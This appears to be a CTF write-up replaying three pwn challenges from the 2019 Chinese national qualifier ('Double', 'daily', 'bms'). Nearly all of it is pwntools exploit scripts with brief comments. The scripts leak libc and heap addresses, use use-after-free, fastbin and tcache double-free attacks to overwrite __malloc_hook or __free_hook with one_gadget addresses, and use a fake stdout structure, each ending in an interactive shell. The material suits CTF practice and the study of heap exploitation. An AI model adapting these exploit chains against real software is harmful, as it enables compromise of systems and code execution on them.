2019国赛初赛pwn复现

Double

got可写,无pie

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

# System libc of the machine the script was written on. The hard-coded constants
# further down (3951480 and the `one` table) presumably match this exact build and
# are not derived at runtime -- verify before reuse on another host.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
elf = ELF('./pwn',checksec=False)
# Candidate offsets into libc; only one[3] is used in this script.
one = [0x45226,0x4527a,0xf0364,0xf1207]

io = process('./pwn')

def add(con):
    """Menu entry 1: create a new record whose content is *con* (sent as a line)."""
    choice = '1'
    io.sendlineafter('> ', choice)
    # one line of program output is consumed before the content is sent
    io.recvline()
    io.sendline(con)

def show(idx):
    """Menu entry 2: display the record stored at index *idx*."""
    choice, index = '2', str(idx)
    io.sendlineafter('> ', choice)
    io.sendlineafter('index: ', index)

def edit(idx, con):
    """Menu entry 3: overwrite the record at index *idx* with *con* (sent as a line)."""
    choice, index = '3', str(idx)
    io.sendlineafter('> ', choice)
    io.sendlineafter('index: ', index)
    # short pause kept from the original before the content goes out
    sleep(0.1)
    io.sendline(con)

def dele(idx):
    """Menu entry 4: delete the record at index *idx*."""
    choice, index = '4', str(idx)
    io.sendlineafter('> ', choice)
    io.sendlineafter('index: ', index)

'''
info structure
{
index int;
size int;
content *chunk_ptr;
next_info *info;
}
edit功能不检查index
'''
# (English rendering of the author's note above: the edit operation does not
# validate the index it is given.)

fake_chunk = 0x4040bd  # assigned but not referenced anywhere below

# Two records of 0x80 bytes, free the first, then display the second.
add(0x80*'A') #0
add(0x80*'A') #1
dele(0)
show(1)

# Everything up to and including the first 0x7f byte is taken as a leaked
# libc pointer; 3951480 is a hard-coded offset for the libc loaded above.
# NOTE(review): the whole recvuntil() result is passed to u64(), so any output
# preceding the pointer would give it more than 8 bytes; slicing the last six
# bytes before ljust() is the more robust form.
libc_base = u64(io.recvuntil('\x7f').ljust(8,'\x00'))-3951480
log.success('libc:'+hex(libc_base))
#free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
#clear unsortedbin

add(0x80*'a') #2

add(0x10*'*') #3
#use 4 and 5 UAF
add(0x60*'B') #4
add(0x60*'B') #5
dele(4)
# Record 5 is rewritten after record 4 was freed (the author's UAF step);
# 0x23 is a hard-coded distance below __malloc_hook, not derived here.
edit(5,p64(malloc_hook-0x23))

add(0x60*'C') #6

#use edit to alloc malloc hook
# 0x13 zero bytes, then the libc address one[3], padded out to the record size.
payload = 0x13*'\x00'+p64(libc_base+one[3])
payload = payload.ljust(0x60,'\x00')
edit(3,payload)

# One more "add" request, then hand the session over to the user.
io.sendlineafter('> ','1')
io.recvline()
io.sendline('A')
io.interactive()

daily

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

elf = ELF('./pwn',checksec=False)
# System libc; the hard-coded constants below (3951480 and the `one` table)
# presumably belong to this exact build -- verify before reuse elsewhere.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
# Candidate offsets into libc; only one[1] is used in this script.
one = [0x45226,0x4527a,0xf0364,0xf1207]
io = process('./pwn')

def add(size, con):
    """Menu entry 2: create a record of *size* bytes, then send *con* raw (no newline)."""
    choice, length = '2', str(size)
    io.sendlineafter('choice:', choice)
    io.sendlineafter('daily:', length)
    # one line of program output is consumed before the content goes out
    io.recvline()
    io.send(con)

def edit(idx, con):
    """Menu entry 3: replace the record at index *idx* with *con*, sent raw (no newline)."""
    choice, index = '3', str(idx)
    io.sendlineafter('choice:', choice)
    io.sendlineafter('daily:', index)
    # one line of program output is consumed before the content goes out
    io.recvline()
    io.send(con)

def dele(idx):
    """Menu entry 4: delete the record at index *idx*."""
    choice, index = '4', str(idx)
    io.sendlineafter('choice:', choice)
    io.sendlineafter('daily:', index)

def show():
    """Menu entry 1: list the stored records."""
    choice = '1'
    io.sendlineafter('choice:', choice)

#leak libc
add(0x88,'aaaa')
add(0x10,'aaaa')
dele(0)
# Re-allocate the freed 0x88 record with eight non-NUL bytes, then list.
add(0x88,'a'*8)
show()
# The six bytes ending at the first 0x7f byte are the leaked pointer;
# 3951480 is a hard-coded offset for the libc loaded above.
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-3951480
log.success('libc: '+hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']

#leak heap addr
add(0x68,'aaaa') #2
add(0x68,'aaaa') #3
dele(2)
dele(3)
#gdb.attach(io)
add(0x68,'\x90') #2
show()
# The listing prints "2 : <bytes>="; the bytes before '=' are read as a heap
# pointer and 0x100 is a hard-coded adjustment chosen by the author.
io.recvuntil('2 : ')
heap = u64(io.recvuntil('=',drop=True).ljust(8,'\x00'))+0x100
log.success('heap: '+hex(heap))

#create a fake node and a fake fastchunk in a real chunk
#use idx to free the fake chunk,then fastbin attack
# Hard-coded address inside the binary; presumably it has no PIE -- verify.
list_addr = 0x602060 #step = 0x10
# NOTE(review): this relies on Python 2 integer division. Under Python 3 `/`
# yields a float and str(idx) would send e.g. '12.0'; `//` is the portable form.
idx = (heap+0x10-list_addr)/0x10
add(0x80,p64(0x68)+p64(heap+0x30)+p64(0)+p64(0x71)) #3

#fastbin attack
dele(idx)
# Same header as record 3 above, followed by malloc_hook-0x23 (hard-coded distance).
edit(3,p64(0x68)+p64(heap+0x30)+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add(0x68,'junk')
#gdb.attach(io)
#write malloc_hook
# 11 bytes of padding, then the libc address one[1] and the address of realloc.
add(0x68,11*'\x00'+p64(libc_base+one[1])+p64(libc_base+libc.sym['realloc']))
# One more "add" request (size 1), then hand the session over to the user.
io.sendlineafter('choice:','2')
io.sendlineafter('daily:','1')
io.interactive()

bms

glibc2.26: tcache_dup

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

context.log_level = 'debug'

# checksec=False is not passed here, unlike the other helpers' ELF() calls on
# this page, so the checksec summary is printed on load.
elf = ELF('./pwn')
# libc/ld pair for 2.27-3ubuntu1; the target is launched under this loader with
# the matching libc preloaded so the hard-coded offsets below (4118704, `one`)
# refer to that build.
libc = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
ld = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so')
io = process(argv=[ld.path,elf.path],env={'LD_PRELOAD' : libc.path})
# Candidate offsets into libc; only one[1] is used in this script.
one = [0x4f2c5,0x4f322,0x10a38c]
# Hard-coded address inside the binary (by its name presumably the stdout
# pointer slot; verify against the ELF before reuse).
stdout = 0x602020

def login():
    """Answer the username/password prompts with the credentials the challenge accepts."""
    for prompt, answer in (('username:', 'admin'), ('password:', 'frame')):
        io.sendlineafter(prompt, answer)

def add(name, size, con, ch=1):
    """Menu entry 1: create an entry called *name* of *size* bytes holding *con*.

    *ch* selects which menu prompt to wait for: 1 (the default) waits for
    '>' followed by a newline, any other value for the bare '>'.
    *name* and *con* are sent raw; *size* is sent as a line.
    """
    prompt = '>\n' if ch == 1 else '>'
    io.sendlineafter(prompt, '1')
    io.sendafter('name:', name)
    io.sendlineafter('size:', str(size))
    io.sendafter('tion:', con)

def dele(idx, ch=1):
    """Menu entry 2: remove the entry at index *idx*.

    *ch* selects the menu prompt form exactly as in add(): 1 waits for '>'
    followed by a newline, any other value for the bare '>'.
    """
    prompt = '>\n' if ch == 1 else '>'
    io.sendlineafter(prompt, '2')
    io.sendlineafter('index:', str(idx))

login()
add('0',0x60,'aaaa')

# The same index is deleted twice (the author labels this tcache_dup).
dele(0)
dele(0)

# Three allocations of the same size: the first carries the hard-coded
# `stdout` address, the third a single 0x60 byte.
add('1',0x60,p64(stdout))
add('2',0x60,'aaaa')
add('3',0x60,'\x60')

# Header constructed by the author (a "fake stdout" per the variable name);
# the individual values are not derived in this script.
fake_stdout = p64(0xfbad1800)+p64(0)*3+p8(8)
add('4',0x60,fake_stdout)

# Eight raw bytes are read back as a libc pointer; 4118704 is a hard-coded
# offset for the libc-2.27 build loaded above.
libc_base = u64(io.recvn(8))-4118704
free_hook = libc_base + libc.sym['__free_hook']

# From here every call passes ch=2, i.e. waits for the bare '>' prompt --
# presumably the program's prompt form differs after the step above; see add().
add('5',0x50,'???',2)
dele(5,2)
dele(5,2)
add('6',0x50,p64(free_hook),2)
add('7',0x50,'aaaa',2)
add('8',0x50,p64(libc_base+one[1]),2)

dele(5,2)
io.interactive()